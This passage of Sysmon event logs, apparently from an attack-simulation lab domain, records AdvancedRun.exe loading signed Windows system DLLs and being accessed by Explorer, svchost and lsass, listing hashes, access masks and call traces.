  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=ATTACKRANGE\Administrator  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077806  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.903
  SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}  SourceProcessId+SourceThreadId=4285444  SourceImage=C:\Windows\Explorer.EXE
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1410
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=ATTACKRANGE\Administrator  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077805  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.903
  SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}  SourceProcessId+SourceThreadId=4285444  SourceImage=C:\Windows\Explorer.EXE
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1000
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=ATTACKRANGE\Administrator  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077804  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.903
  SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}  SourceProcessId+SourceThreadId=4285444  SourceImage=C:\Windows\Explorer.EXE
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1000
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=ATTACKRANGE\Administrator  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077803  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.903
  SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}  SourceProcessId+SourceThreadId=4285444  SourceImage=C:\Windows\Explorer.EXE
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1410
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=ATTACKRANGE\Administrator  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077802  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.759
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll
  FileVersion=10.0.14393.4169 (rs1_release.210107-1130)  Description=Touch Keyboard and Handwriting Panel Text Services Framework  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=TipTsf.dll
  Hashes=MD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077801  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.754
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\clbcatq.dll
  FileVersion=2001.12.10941.16384 (rs1_release.210107-1130)  Description=COM+ Configuration Catalog  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=CLBCATQ.DLL
  Hashes=MD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077798  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.650
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\dwmapi.dll
  FileVersion=10.0.14393.4169 (rs1_release.210107-1130)  Description=Microsoft Desktop Window Manager API  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=dwmapi.dll
  Hashes=MD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077797  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.649
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\msvcp_win.dll
  FileVersion=10.0.14393.2999 (rs1_release_inmarket.190520-1518)  Description=Microsoft® C Runtime Library  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=msvcp_win.dll
  Hashes=MD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077796  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.649
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\oleaut32.dll
  FileVersion=10.0.14393.4402 (rs1_release.210426-1725)  Description=OLEAUT32.DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=OLEAUT32.DLL
  Hashes=MD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077795  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.649
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\msctf.dll
  FileVersion=10.0.14393.4530 (rs1_release.210705-0736)  Description=MSCTF Server DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=MSCTF.DLL
  Hashes=MD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBC
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077794  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.648
  SourceProcessGUID={834264DD-DAE7-61EA-1700-000000002702}  SourceProcessId+SourceThreadId=13003532  SourceImage=C:\Windows\System32\svchost.exe
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1400
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=NT AUTHORITY\SYSTEM  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077793  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.647
  SourceProcessGUID={834264DD-DAE7-61EA-1700-000000002702}  SourceProcessId+SourceThreadId=13001340  SourceImage=C:\Windows\System32\svchost.exe
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1478
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=NT AUTHORITY\SYSTEM  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077792  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.647
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\uxtheme.dll
  FileVersion=10.0.14393.4169 (rs1_release.210107-1130)  Description=Microsoft UxTheme Library  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=UxTheme.dll
  Hashes=MD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077791  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.642
  SourceProcessGUID={834264DD-DAE4-61EA-0C00-000000002702}  SourceProcessId+SourceThreadId=6524660  SourceImage=C:\Windows\system32\lsass.exe
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1000
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=NT AUTHORITY\SYSTEM  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077790  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.638
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\imm32.dll
  FileVersion=10.0.14393.0 (rs1_release.160715-1616)  Description=Multi-User Windows IMM32 API Client DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=imm32
  Hashes=MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077789  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.636
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\ole32.dll
  FileVersion=10.0.14393.4651 (rs1_release.210911-1554)  Description=Microsoft OLE for Windows  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=OLE32.DLL
  Hashes=MD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294D
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077788  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.636
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\kernel.appcore.dll
  FileVersion=10.0.14393.2312 (rs1_release.180607-1919)  Description=AppModel API Host  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=kernel.appcore.dll
  Hashes=MD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077787  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.635
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\advapi32.dll
  FileVersion=10.0.14393.4886 (rs1_release.220104-1735)  Description=Advanced Windows 32 Base API  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=advapi32.dll
  Hashes=MD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077786  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.635
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\powrprof.dll
  FileVersion=10.0.14393.0 (rs1_release.160715-1616)  Description=Power Profile Helper DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=POWRPROF.DLL
  Hashes=MD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077785  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.635
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\windows.storage.dll
  FileVersion=10.0.14393.4886 (rs1_release.220104-1735)  Description=Microsoft WinRT Storage API  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=Windows.Storage.dll
  Hashes=MD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077784  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.633
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\cfgmgr32.dll
  FileVersion=10.0.14393.0 (rs1_release.160715-1616)  Description=Configuration Manager DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=CFGMGR32.DLL
  Hashes=MD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077783  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.633
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\sechost.dll
  FileVersion=10.0.14393.4886 (rs1_release.220104-1735)  Description=Host for SCM/SDDL/LSA Lookup APIs  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=sechost.dll
  Hashes=MD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077782  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.633
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\shell32.dll
  FileVersion=10.0.14393.4886 (rs1_release.220104-1735)  Description=Windows Shell Common Dll  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=SHELL32.DLL
  Hashes=MD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077781  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.633
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\bcryptprimitives.dll
  FileVersion=10.0.14393.4770 (rs1_release.211101-1440)  Description=Windows Cryptographic Primitives Library  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=bcryptprimitives.dll
  Hashes=MD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077780  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.633
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\shlwapi.dll
  FileVersion=10.0.14393.4169 (rs1_release.210107-1130)  Description=Shell Light-weight Utility Library  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=SHLWAPI.DLL
  Hashes=MD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077779  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.632
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\cryptbase.dll
  FileVersion=10.0.14393.0 (rs1_release.160715-1616)  Description=Base cryptographic API DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=cryptbase.dll
  Hashes=MD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077778  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.632
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\SHCore.dll
  FileVersion=10.0.14393.4169 (rs1_release.210107-1130)  Description=SHCORE  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=SHCORE.dll
  Hashes=MD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FA
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077777  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.632
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\sspicli.dll
  FileVersion=10.0.14393.4704 (rs1_release.211004-1917)  Description=Security Support Provider Interface  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=security.dll
  Hashes=MD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077776  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.631
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\comdlg32.dll
  FileVersion=10.0.14393.4283 (rs1_release.210303-1802)  Description=Common Dialogs DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=comdlg32.dll
  Hashes=MD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077775  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.631
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\profapi.dll
  FileVersion=10.0.14393.0 (rs1_release.160715-1616)  Description=User Profile Basic API  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=PROFAPI.DLL
  Hashes=MD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873C
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077774  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.631
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\gdi32full.dll
  FileVersion=10.0.14393.4886 (rs1_release.220104-1735)  Description=GDI Client DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=gdi32
  Hashes=MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077773  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.631
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\rpcrt4.dll
  FileVersion=10.0.14393.4886 (rs1_release.220104-1735)  Description=Remote Procedure Call Runtime  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=rpcrt4.dll
  Hashes=MD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776C
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077772  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.631
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\ucrtbase.dll
  FileVersion=10.0.14393.3659 (rs1_release_1.200410-1813)  Description=Microsoft® C Runtime Library  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=ucrtbase.dll
  Hashes=MD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077771  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.631
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\gdi32.dll
  FileVersion=10.0.14393.4169 (rs1_release.210107-1130)  Description=GDI Client DLL  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=gdi32
  Hashes=MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDF
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077770  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.630
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\userenv.dll
  FileVersion=10.0.14393.4583 (rs1_release.210730-1850)  Description=Userenv  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=userenv.dll
  Hashes=MD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7
  Signed=true  Signature=Microsoft Windows  SignatureStatus=Valid  User=ATTACKRANGE\Administrator

EventRecordID=4077769  EventID=7 (Image loaded)  UtcTime=2022-01-21 20:16:32.630
  ProcessGuid={834264DD-14A0-61EB-9208-000000002702}  ProcessId=6016  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ImageLoaded=C:\Windows\SysWOW64\combase.dll
  FileVersion=10.0.14393.4886 (rs1_release.220104-1735)  Description=Microsoft COM for Windows  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=COMBASE.DLL
